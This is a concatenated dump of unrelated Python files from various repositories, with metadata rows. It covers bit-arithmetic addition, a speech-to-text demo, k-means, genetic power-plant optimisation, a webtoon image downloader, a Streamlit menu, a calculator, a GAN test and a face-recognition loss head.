MAX_INT = 0x7FFFFFFF
MASK = 0x100000000
if a == 0:
return b
if b == 0:
return a
while b != 0:
_sum = (a ^ b) % MASK #calculate sum of a and b without thinking the carry
b = ((a & b)<<1) % MASK #calculate the carry
a = _sum # add sum(without carry) and carry
return a if a <= MAX_INT else ~((a & MAX_INT) ^ MAX_INT) #把31位之后的全部置1
7/9/2018 Update:
class Solution(object):
def getSum(self, a, b):
"""
:type a: int
:type b: int
:rtype: int
"""
if not a or not b:
return a or b
mask = 0xffffffff
while b:
_sum = (a ^ b) & mask
b = ((a & b) << 1) & mask
a = _sum
if (a >> 31) & 1:
return ~(a ^ mask)
else:
return a
class Solution(object):
def getSum(self, a, b):
"""
:type a: int
:type b: int
:rtype: int
"""
if a == 0:
return b
elif b == 0:
return a
mask = 0xffffffff # 32 bits all 1
# this mask just converts it to 32bit int
# in Python, every integer is associated with its two's complement and its sign.
# However, doing bit operation "& mask" loses the track of sign.
# Therefore, after the while loop, a is the two's complement of the final result as a 32-bit unsigned integer.
while b != 0:
a, b = (a ^ b) & mask, ((a & b) << 1) & mask
# a is negative if the first bit is 1
if (a >> 31) & 1: # shift by 31 and compare with 1
return ~(a ^ mask) # flip bits
else:
return a
| true |
68de7bc3706bc438fb16483391daa368d5c40886 | Python | aubreystevens/image_processing_pipeline | /text_files/.ipynb_checkpoints/untitled-3-checkpoint.py | UTF-8 | 255 | 3.203125 | 3 | [] | no_license | def set_row(values):
'''
Change the contents of the indicated row on the indicated face.
The internal representation of the cube is not altered.
'''
vals = copy.deepcopy(values)
print(vals)
set_row([1, 2, 3])
| true |
9e547851eccb6893199915773ba24fccae128582 | Python | KodeWorker/transformer_demo | /Speech2Text/AudioDemo/main.py | UTF-8 | 3,007 | 2.578125 | 3 | [] | no_license | import pyaudio
import wave
import numpy as np
from queue import Queue
import copy
from eval import translate
import threading
class TranslatingThread(threading.Thread):
def __init__(self, data, rate, model_name):
super().__init__()
self.data = data
self.rate = rate
self.model_name = model_name
def run(self):
translation = translate(self.data, self.rate, self.model_name)
print(translation)
def IsActivate(activation_buffer, rate, chunk, last_sec, lb):
buffer = list(activation_buffer.queue)
volume = [np.max(np.abs(buf)) for buf in buffer][-int(rate/chunk*last_sec):]
if np.max(volume) < lb:
return False
else:
return True
def SaveBuffer(buffer, filename, channels, audio_format, rate):
frames = buffer.queue
waveFile = wave.open(filename, 'wb')
waveFile.setnchannels(channels)
waveFile.setsampwidth(audio.get_sample_size(audio_format))
waveFile.setframerate(rate)
waveFile.writeframes(b''.join(frames))
waveFile.close()
def BufferOutput(buffer):
frames = buffer.queue
output = []
for frame in frames:
output += np.frombuffer(frame, dtype=np.int16).tolist()
return output
if __name__ == "__main__":
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
CHUNK = 1024
ACTIVATION_BUFFER = 5
WAVE_OUTPUT_FILENAME = "./temp.wav"
PRETRAINED_MODEL_NAME = "facebook/s2t-small-librispeech-asr"
audio = pyaudio.PyAudio()
# start Recording
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True,
frames_per_buffer=CHUNK)
isMonitoring = True
isActivate = False
prevActivate = False
activation_buffer = Queue(maxsize=RATE/CHUNK*ACTIVATION_BUFFER)
buffer = Queue()
#print(RATE/CHUNK*ACTIVATION_BUFFER)
print("monitoring..")
while(isMonitoring):
data = stream.read(CHUNK)
numpydata = np.frombuffer(data, dtype=np.int16)
if activation_buffer.full():
activation_buffer.get()
activation_buffer.put(numpydata)
isActivate = IsActivate(activation_buffer, RATE, CHUNK, 2, lb=15000)
if isActivate:
print("recording...", end="\r")
buffer.put(data)
if(prevActivate and not isActivate):
#SaveBuffer(buffer, WAVE_OUTPUT_FILENAME, CHANNELS, FORMAT, RATE)
inputs = BufferOutput(buffer)
#inputs = (np.array(inputs) / 32767) * np.max(np.abs(inputs))
inputs = (inputs - np.mean(inputs)) / np.std(inputs)
t = TranslatingThread(inputs, RATE, PRETRAINED_MODEL_NAME)
t.start()
buffer.queue.clear()
print("sentence end")
prevActivate = isActivate
#print(f"volume: {np.max(np.abs(numpydata))}")
#print(f"queue size: {activation_buffer.qsize()}")
| true |
5c615a9d911b57c6ecabe1abf51453ba9e84c265 | Python | open-mmlab/mmagic | /tests/test_models/test_base_models/test_basic_interpolator.py | UTF-8 | 1,226 | 2.578125 | 3 | [
"Apache-2.0"
] | permissive | # Copyright (c) OpenMMLab. All rights reserved.
import torch
from torch import nn
from mmagic.models import BasicInterpolator
from mmagic.models.losses import L1Loss
from mmagic.registry import MODELS
@MODELS.register_module()
class InterpolateExample(nn.Module):
"""An example of interpolate network for testing BasicInterpolator."""
def __init__(self):
super().__init__()
self.layer = nn.Conv2d(3, 3, 3, 1, 1)
def forward(self, x):
return self.layer(x[:, 0])
def init_weights(self, pretrained=None):
pass
def test_basic_interpolator():
model = BasicInterpolator(
generator=dict(type='InterpolateExample'),
pixel_loss=dict(type='L1Loss'))
assert model.__class__.__name__ == 'BasicInterpolator'
assert isinstance(model.generator, InterpolateExample)
assert isinstance(model.pixel_loss, L1Loss)
input_tensors = torch.rand((1, 9, 3, 16, 16))
input_tensors = model.split_frames(input_tensors)
assert input_tensors.shape == (8, 2, 3, 16, 16)
output_tensors = torch.rand((8, 1, 3, 16, 16))
result = model.merge_frames(input_tensors, output_tensors)
assert len(result) == 17
assert result[0].shape == (16, 16, 3)
| true |
cb2e685f9e3387660140cc212bea22b76a7991f2 | Python | smutek/learning-python | /unit-1/python-collections/exercise/stringcases.py | UTF-8 | 243 | 3.640625 | 4 | [] | no_license | # reversing a string, see http://stackoverflow.com/a/931095
def stringcases(string):
formats = (string.upper(), string.lower(), string.title(), string[::-1])
return formats
print(stringcases("Row row row your boat down the stream"))
| true |
acb9b2abbc6e9b15b399ade2443bea40389580bd | Python | fengges/leetcode | /351-400/398. 随机数索引.py | UTF-8 | 323 | 3.0625 | 3 | [] | no_license | import random
class Solution:
def __init__(self, nums):
self.dic={}
for i,n in enumerate(nums):
if n not in self.dic:
self.dic[n]=[]
self.dic[n].append(i)
def pick(self, target):
tmp=self.dic[target]
return tmp[random.randint(0,len(tmp)-1)]
| true |
b6d55a6f3df3096b070fa24fa3486859c15582cc | Python | darkowic/ai-basics | /powerhouse-optimization/helpers.py | UTF-8 | 3,648 | 3.546875 | 4 | [] | no_license | #!/usr/bin/env python
from random import randint
class Powerhouse(object):
def __init__(self, p_min, p_max, a, b, c, s):
self.p_min = p_min
self.p_max = p_max
self.a = a
self.b = b
self.c = c
self.s = s
self.state = [
randint(0, 1),
randint(0, 1),
randint(0, 1),
randint(0, 1),
randint(0, 1),
]
@property
def power(self):
return self.calculate_power(self.level)
@property
def fuel_cost(self):
return self.calculate_fuel_cost(self.power)
@property
def level(self):
return self.calculate_level()
def calculate_power(self, power_level):
return self.p_min + (self.p_max - self.p_min) * power_level
def calculate_fuel_cost(self, power):
return self.a + self.b * power + self.c * pow(power, 2)
def calculate_level(self):
return self.calculate_integer_level() / 31
def calculate_integer_level(self):
return 16 * self.state[0] + 8 * self.state[1] + 4 * self.state[2] + 2 * self.state[3] + self.state[4]
def level_increment(self):
level = self.calculate_integer_level()
if level >= 31:
return False
self.state = [int(i) for i in '{:05b}'.format(level + 1)]
return True
def level_decrement(self):
level = self.calculate_integer_level()
if level <= 0:
return False
self.state = [int(i) for i in '{:05b}'.format(level - 1)]
return True
def get_state(candidate):
return sum([powerhouse.state for powerhouse in candidate], [])
def apply_state(state, candidate):
for powerhouse_index, start_index in enumerate(range(0, len(state), 5)):
candidate[powerhouse_index].state = state[start_index:start_index + 5]
def apply_mutation(state):
mutation_index = randint(0, len(state) - 1)
state[mutation_index] = 0 if state[mutation_index] == 1 else 1
def one_point_crossing(input1, input2):
crossing_point = randint(1, len(input1) - 1)
result1 = input1[:crossing_point]
result1.extend(input2[crossing_point:])
result2 = input2[:crossing_point]
result2.extend(input1[crossing_point:])
return result1, result2
def calculate_epsilon(candidate, demand):
power = 0
power_lost = 0
for powerhouse in candidate:
power += powerhouse.power
power_lost += powerhouse.s * pow(powerhouse.power, 2)
return power - demand - power_lost
def network_cost(candidate):
cost = 0
for powerhouse in candidate:
cost += powerhouse.fuel_cost
return cost
def aim_function(candidate, demand, w):
cost = network_cost(candidate)
epsilon = calculate_epsilon(candidate, demand)
# print(f'COST: {cost}, EPSILON: {epsilon}')
return cost + w * abs(epsilon)
def fix_candidate(candidate, demand):
epsilon = calculate_epsilon(candidate, demand)
if abs(epsilon) <= 100:
return False
if epsilon < 0:
while epsilon < -100:
candidate_sorted = sorted(candidate, key=lambda x: x.level)
if not any(powerhouse.level_increment() for powerhouse in candidate_sorted):
return False
epsilon = calculate_epsilon(candidate, demand)
else:
while epsilon > 100:
candidate_sorted = sorted(candidate, key=lambda x: x.level, reverse=True)
if not any(powerhouse.level_decrement() for powerhouse in candidate_sorted):
print('not called even once!')
return False
epsilon = calculate_epsilon(candidate, demand)
| true |
febc6d18c8733d494437a4e5b1610f3e5d8accf3 | Python | ChangXiaodong/Leetcode-solutions | /3/437-Path_Sum_III.py | UTF-8 | 1,252 | 3.515625 | 4 | [] | no_license | # coding=utf-8
'''
后序遍历,求出左子节点可能出现的和,右子节点可能出现的和,本节点的和分别和左右子节点可能出现的和相加,如果等于sum,则计数+1
如果本节点的和自身等于sum,计数+1
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def post_order(self, node, sum):
if not node:
return []
left = self.post_order(node.left, sum)
right = self.post_order(node.right, sum)
res = []
for v in left:
res.append(v + node.val)
if node.val + v == sum:
self.cnt += 1
for v in right:
res.append(v + node.val)
if node.val + v == sum:
self.cnt += 1
if node.val == sum:
self.cnt += 1
res.append(node.val)
return res
def pathSum(self, root, sum):
"""
:type root: TreeNode
:type sum: int
:rtype: int
"""
if not root:
return 0
self.cnt = 0
self.post_order(root, sum)
return self.cnt
| true |
e3ce88196d04245690f68c15105841fc88448d90 | Python | EwardJohn/Kmeans | /kmeans_clustrering.py | UTF-8 | 3,559 | 2.734375 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
def Json2txt(inpath,outpath):
with open(inpath,'r',encoding='utf-8') as f:
data = json.load(f)
# x = random.randint(0,70000)
ann = data['annotations']
result = random.sample(ann,4000)
coord = list([round(i['bbox'][0],2),round(i['bbox'][1],2)] for i in result)
with open(outpath,'w',encoding='utf-8') as w:
for i in coord:
w.write(str(i[0])+' '+str(i[1])+'\n')
w.close()
f.close()
def load_data(filename):
return np.loadtxt(filename)
def euclidian(x,y):
return np.linalg.norm(x-y)
def Draw(k,centroids,min_position):
# colors = [plt.cm.tab10(i/float(k-1)) for i in range(k)]
colors = ['r','g','c','y']
fig, ax = plt.subplots()
dataset = load_data('./k-means_clustering/data2.txt')
print(min_position)
#------------------------------------------------------------------------------------------
#画出几组不同的点
for index in range(k):
mid_position = [i for i in range(len(min_position)) if min_position[i] == index]
for ele in mid_position:
ax.plot(dataset[ele][0],dataset[ele][1],(colors[index]+'o'))
#------------------------------------------------------------------------------------------
# 画出中心点的变化过程
points = []
for index, mid_points in enumerate(centroids):
for inner, content in enumerate(mid_points):
if index == 0:
points.append(ax.plot(content[0],content[1],'bo')[0])
else:
points[inner].set_data(content[0],content[1])
print("centroids {} {}".format(index,content))
plt.pause(0.8)
def Kmeans(k, elision=0, distance='euclidian'):
centroids = []
if distance == 'euclidian':
dist_method = euclidian
dataset = load_data('./k-means_clustering/data2.txt')
num_instances, num_features = dataset.shape
samples = dataset[np.random.randint(0,num_instances-1,size=k)]
centroids.append(samples)
old_samples = np.zeros(samples.shape)
min_position = np.zeros((num_instances,1))
dist = dist_method(samples,old_samples)
num = 0
while dist > elision:
num += 1
dist = dist_method(samples,old_samples)
old_samples = samples
#-----------------------------------------------------------------------------------------
#calculate the distances between samples and dateset and record the min value's position
for index, instances in enumerate(dataset):
dist_list = np.zeros((k,1))
for numbers, element in enumerate(samples):
dist_list[numbers] = dist_method(instances,element)
min_position[index,0] = np.argmin(dist_list)
tem_result = np.zeros((k, num_features))
#-----------------------------------------------------------------------------------------
#calculate the mean value of different groups and update the samples
for index_samples in range(len(samples)):
mid_position = [i for i in range(len(min_position)) if min_position[i] == index_samples]
sample = np.mean(dataset[mid_position], axis=0)
tem_result[index_samples, :] = sample
samples = tem_result
centroids.append(tem_result)
return samples, centroids, min_position
if __name__ == "__main__":
Json2txt('./train.json','./data2.txt'')
samples, centroids, min_position = Kmeans(4)
Draw(4,centroids, min_position)
| true |
2343d3a25af06cd3b629ccec73d08b3f16f9d5ef | Python | ttsiodras/UnblockMeSolver | /stats.py | UTF-8 | 764 | 3.125 | 3 | [] | no_license | import math
total = totalSq = n = 0
allOfThem = []
while True:
try:
a = float(raw_input())
except:
break
total += a
totalSq += a * a
n += 1
allOfThem.append(a)
varianceFull = (totalSq - total * total / n) / n
variance = (totalSq - total * total / n) / (n - 1)
srted = sorted(allOfThem)
measurements = [
("Total samples", n),
("Average value", total / n),
("Std deviation", math.sqrt(varianceFull)),
("Sample stddev", math.sqrt(variance)),
("Median", srted[len(allOfThem) / 2]),
("Min", srted[0]),
("Max", srted[-1]),
("Overall", str(total / n) + " +/- " + "%2.1f%%" %
(100 * math.sqrt(variance) * n / total))
]
for label, value in measurements:
print "%*s:" % (15, label), value
| true |
6f73a4f7af8979552aa30de88ef7e5e47ffcde69 | Python | subhashissarangi/PYTHON_NEW | /src/recursion/FibonacciNumbers.py | UTF-8 | 627 | 2.953125 | 3 | [] | no_license | '''
Created on 31-Jan-2020
@author: SUBHASHIS
'''
from builtins import object
from pip._internal.utils.outdated import SELFCHECK_DATE_FMT
class Fibonacci(object):
def __init__(self) :
pass
n=int(input("please anter a number to get fibonacci: "))
def fib(n):
if n == 0:
return 0
elif n == 1:
return 1
else:
return fib(n-1) + fib(n-2)
def fibi(n):
old, new = 0, 1
if n == 0:
return 0
for i in range(n-1):
old, new = new, old + new
return new
print(fib(n))
print(fibi(n))
| true |
cb9708af4fa80ea57c9bc82285fe0acedb1b314e | Python | o2yama/py00-lite | /ex/ex1/today.py | UTF-8 | 91 | 2.78125 | 3 | [] | no_license | import datetime
today = datetime.date.today()
print('今日の日付 : {0}'.format(today)) | true |
c4ecfc6da3e6e2552a821e7c691e39247fc13cfe | Python | itsfarhanabidi/TESTUBE.ai | /WebApp/Navigation_Window.py | UTF-8 | 2,263 | 2.53125 | 3 | [] | no_license | import streamlit as st
import os
import keyboard
#################################################################################
st.set_page_config(page_title = "Navigation Window")
#################################################################################
def local_css(file_name):
with open(file_name) as f:
st.markdown(f'<style>{f.read()}</style>', unsafe_allow_html=True)
local_css("navigation_style.css")
def remote_css(url):
st.markdown(f'<link href="{url}" rel="stylesheet">', unsafe_allow_html=True)
remote_css('https://fonts.googleapis.com/icon?family=Material+Icons')
#################################################################################
st.markdown("""<div class="title">Navigation Window</div>""",True)
st.write("")
st.write("")
st.write("")
st.write("")
st.write("")
st.write("")
col_1, col_2, col_3, col_4, col_5 = st.beta_columns(5)
predict = col_1.button("Predict a Chest X-ray")
search = col_3.button("Search & View Patients")
edit = col_5.button("Edit Patient Records")
st.write("")
st.write("")
st.write("")
st.write("")
st.write("")
col_1, col_2, col_3, col_4, col_5 = st.beta_columns(5)
add_test = col_1.button("Add Patient Test")
add_pres = col_3.button("Add Prescription")
data_analysis = col_5.button("Data Analysis Report")
if (predict):
keyboard.press_and_release('ctrl + w')
path = r"C:\Users\Admin\Desktop\UI_Phase2\UITesting.py"
os.system(f"streamlit run {path}")
elif (search):
keyboard.press_and_release('ctrl + w')
path = r"C:\Users\Admin\Desktop\UI_Phase2\search_page.py"
os.system(f"streamlit run {path}")
elif (edit):
keyboard.press_and_release('ctrl + w')
path = r"C:\Users\Admin\Desktop\UI_Phase2\edit_page.py"
os.system(f"streamlit run {path}")
elif(add_test):
keyboard.press_and_release('ctrl + w')
path = r"C:\Users\Admin\Desktop\UI_Phase2\PMS_page.py"
os.system(f"streamlit run {path}")
elif(add_pres):
keyboard.press_and_release('ctrl + w')
path = r"C:\Users\Admin\Desktop\UI_Phase2\prescription_page.py"
os.system(f"streamlit run {path}")
elif(data_analysis):
keyboard.press_and_release('ctrl + w')
path = r"C:\Users\Admin\Desktop\UI_Phase2\data_analysis_page.py"
os.system(f"streamlit run {path}")
| true |
1f42865089e4d31a8141360dff7b299af108df15 | Python | seungkilee-cs/utilities | /python/kakaopage-ripper.py | UTF-8 | 1,241 | 2.53125 | 3 | [] | no_license | import selenium
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
import urllib
import urllib.request
from selenium.common.exceptions import NoSuchElementException
# 첫화 URL
URL = "https://page.kakao.com/viewer?productId=54417128"
# 크롬 드라이버 셋업
driver = webdriver.Chrome(executable_path='chromedriver')
driver.implicitly_wait(time_to_wait=1)
driver.get(URL)
name = '프로야구 생존기'
# 몇화까지
ep_num = 3
# For Loop
for ep in range(0, ep_num):
try:
first = driver.find_element_by_xpath('/html/body/div[4]/div/div/div/img')
first.click()
except NoSuchElementException:
first = driver.find_element_by_xpath('/html/body/div[3]/div/div/div/img')
first.click()
img_num = 1
while True:
try:
img = driver.find_element_by_xpath('//*[@id="root"]/div[3]/div/div/div/div/div[1]/div[' + str(img_num) + ']/img')
src = img.get_attribute('src')
urllib.request.urlretrieve(src, '프로야구 생존기_%03d'%(img_num))
except NoSuchElementException:
break
img_num = img_num + 1
next_ep = driver.find_element_by_xpath('//*[@id="kpw-header"]/div[2]/span[4]')
next_ep.click()
| true |
b27335320a0d22c13f330ad2157968b0919cbaa0 | Python | SuperKuroko/ECNU-2021-Spring-MySQL-Project | /source_code/sent_email.py | UTF-8 | 1,272 | 2.671875 | 3 | [] | no_license | import re
import smtplib
import random
from email.mime.text import MIMEText
def email_type(email):
test_type = re.compile("^[a-zA-Z0-9_-]+@test+(\.[a-zA-Z0-9_-]+)+$")
right_type = re.compile("^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$")
if test_type.match(email):
return 0
elif right_type.match(email):
return 1
return -1
def sent_email(receiver):
mail_host = "" #such as stmp.qq.com
mail_user = "" #such as xxx@xxx.com
mail_pass = "" #not your account password!
sender = ""
title = "饱了没-邮箱验证码"
code = ""
for i in range(6):
code += str(random.randint(0, 9))
content = "【饱了没】验证码:%s,请在 5 分钟内完成操作。如非本人操作,请忽略。" % code
message = MIMEText(content, "plain", "utf-8")
message["From"] = "{}".format(sender)
message["To"] = ",".join(receiver)
message["Subject"] = title
try:
smtp_object = smtplib.SMTP_SSL(mail_host, 465)
smtp_object.login(mail_user, mail_pass)
smtp_object.sendmail(sender, receiver, message.as_string())
return code
except smtplib.SMTPException as error:
return str(error)
if __name__ == "__main__":
pass
#print(email_type("123456@test.com"))
| true |
34a4a7d471f3365bcb824212832311c2cf7befa7 | Python | UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018 | /students/JerryH/Lesson06/calculator/calculator.py | UTF-8 | 1,625 | 4.03125 | 4 | [] | no_license | """
Calculator module
"""
from .exceptions import InsufficientOperands
class Calculator():
"""
Create the calculator object.
"""
def __init__(self, adder, subtracter, multiplier, divider):
"""
Initialize the calculator
"""
self.adder = adder
self.subtracter = subtracter
self.multiplier = multiplier
self.divider = divider
self.stack = []
def enter_number(self, number):
"""
Insert the input to the front of self.stack
"""
# self.stack.insert(0, number)
self.stack.append(number)
def _do_calc(self, operator):
"""
Return result of the operation of the first 2 elements of self.stack
"""
try:
result = operator.calc(self.stack[0], self.stack[1])
except IndexError:
raise InsufficientOperands
except ZeroDivisionError:
result = 0
self.stack = [result]
return result
def add(self):
"""
Return the sum of the first 2 elements of self.stack
"""
return self._do_calc(self.adder)
def subtract(self):
"""
Return the difference of the first 2 elements of self.stack
"""
return self._do_calc(self.subtracter)
def multiply(self):
"""
Return the product of the first 2 elements of self.stack
"""
return self._do_calc(self.multiplier)
def divide(self):
"""
Return the quotient of the first 2 elements of self.stack
"""
return self._do_calc(self.divider)
| true |
efc79709e4ea01cb7e91995954ec18a88e5051fe | Python | marqueze23/curso-python | /conjuntos.py | UTF-8 | 229 | 3.4375 | 3 | [] | no_license | conjuntos=set()
conjuntos={1,2,3,"Hola","humano",1,2,3}
print(conjuntos)
#conjuntos.append(5)
conjuntos.add(5)
print(conjuntos)
print("3 in conjuntos=",3 in conjuntos)
conjuntos.discard(1)
print("conjuntos.discard(1)=",conjuntos) | true |
af70e3013ec8e912ccfbe449fbe88c26821ccb4b | Python | xj-xx/CVAE-GAN-zoos-PyTorch-Beginner | /WGAN-GP/WDCGAN-GP_TEST.py | UTF-8 | 1,283 | 2.625 | 3 | [] | no_license | import torch.nn as nn
import matplotlib.pyplot as plt
import torch
from torchvision.utils import make_grid
import numpy as np
class generator(nn.Module):
def __init__(self,input_size,num_feature):
super(generator, self).__init__()
self.fc=nn.Linear(input_size,num_feature)
self.br=nn.Sequential(
nn.BatchNorm2d(1),
nn.ReLU(True),
)
self.gen = nn.Sequential(
nn.Conv2d(1,64,3,stride=1,padding=1),
nn.BatchNorm2d(64),
nn.ReLU(True),
nn.Conv2d(64,32,3,stride=1,padding=1),
nn.BatchNorm2d(32),
nn.ReLU(True),
nn.Conv2d(32,1,3,stride=2,padding=1),
nn.Tanh(),
)
def forward(self, x):
x = self.fc(x)
x=x.view(x.shape[0],1,56,56)
x=self.br(x)
x=self.gen(x)
return x
G = generator(100,1*56*56)
if torch.cuda.is_available():
G = G
g_optimizer = torch.optim.Adam(G.parameters(), lr=0.0003)
G.load_state_dict(torch.load('./generator_WDCGAN-GP.pth'))
z_dimension = 100
z = torch.randn((80, z_dimension))
fake_img = G(z)
img = make_grid(fake_img,nrow=8).clamp(0,1).detach().numpy()
plt.imshow(np.transpose(img,(1,2,0)))
plt.show()
| true |
1f7979014f79a6cfbd57fb87fd80ef7d36246930 | Python | GitDataNet/gitdata | /tests/test_io.py | UTF-8 | 1,571 | 2.9375 | 3 | [] | no_license | #!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import tempfile
import os
from gitdata import get_file_list
from gitdata import file_sha1sum
from gitdata import files_sha1sum
class TestIO(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.tempdir = tempfile.mkdtemp()
cls.dir_name = 'files'
cls.files_dir = os.path.join(cls.tempdir, cls.dir_name)
os.mkdir(cls.files_dir)
new_files = ['file1.txt', 'file2.txt']
for fname in new_files:
open(os.path.join(cls.files_dir, fname), 'w').write(fname)
def test_list_files(self):
os.chdir(self.tempdir)
paths = ['files/file1.txt', 'files/file2.txt']
self.assertItemsEqual(get_file_list(self.dir_name), paths)
def test_file_sha1sum(self):
file_path = os.path.join(self.files_dir, 'file1.txt')
self.assertEqual(
file_sha1sum(file_path),
'ce1be0ff4065a6e9415095c95f25f47a633cef2b'
)
def test_file_sha1sum_file_not_found(self):
file_path = os.path.join(self.files_dir, 'fail_file.txt')
self.assertEqual(file_sha1sum(file_path), None)
def test_files_sha1sum(self):
path_list = get_file_list(self.files_dir)
expected = {
os.path.join(self.files_dir, 'file1.txt'):
'ce1be0ff4065a6e9415095c95f25f47a633cef2b',
os.path.join(self.files_dir, 'file2.txt'):
'c2edf7b002d0354039a8aaba3bc53180caf3d248',
}
self.assertEqual(files_sha1sum(path_list), expected)
| true |
d49c088ebaaaa0b4f30dbdbbf73258675f0e934a | Python | hexieshenghuo/FaceX-Zoo | /head/CurricularFace.py | UTF-8 | 1,889 | 2.65625 | 3 | [
"Apache-2.0"
] | permissive | """
@author: Jun Wang
@date: 20201126
@contact: jun21wangustc@gmail.com
"""
# based on
# https://github.com/HuangYG123/CurricularFace/blob/master/head/metrics.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
import math
class CurricularFace(nn.Module):
"""Implementation for "CurricularFace: Adaptive Curriculum Learning Loss for Deep Face Recognition".
"""
def __init__(self, feat_dim, num_class, m = 0.5, s = 64.):
super(CurricularFace, self).__init__()
self.m = m
self.s = s
self.cos_m = math.cos(m)
self.sin_m = math.sin(m)
self.threshold = math.cos(math.pi - m)
self.mm = math.sin(math.pi - m) * m
self.kernel = Parameter(torch.Tensor(feat_dim, num_class))
self.register_buffer('t', torch.zeros(1))
nn.init.normal_(self.kernel, std=0.01)
def forward(self, feats, labels):
kernel_norm = F.normalize(self.kernel, dim=0)
cos_theta = torch.mm(feats, kernel_norm)
cos_theta = cos_theta.clamp(-1, 1) # for numerical stability
with torch.no_grad():
origin_cos = cos_theta.clone()
target_logit = cos_theta[torch.arange(0, feats.size(0)), labels].view(-1, 1)
sin_theta = torch.sqrt(1.0 - torch.pow(target_logit, 2))
cos_theta_m = target_logit * self.cos_m - sin_theta * self.sin_m #cos(target+margin)
mask = cos_theta > cos_theta_m
final_target_logit = torch.where(target_logit > self.threshold, cos_theta_m, target_logit - self.mm)
hard_example = cos_theta[mask]
with torch.no_grad():
self.t = target_logit.mean() * 0.01 + (1 - 0.01) * self.t
cos_theta[mask] = hard_example * (self.t + hard_example)
cos_theta.scatter_(1, labels.view(-1, 1).long(), final_target_logit)
output = cos_theta * self.s
return output
| true |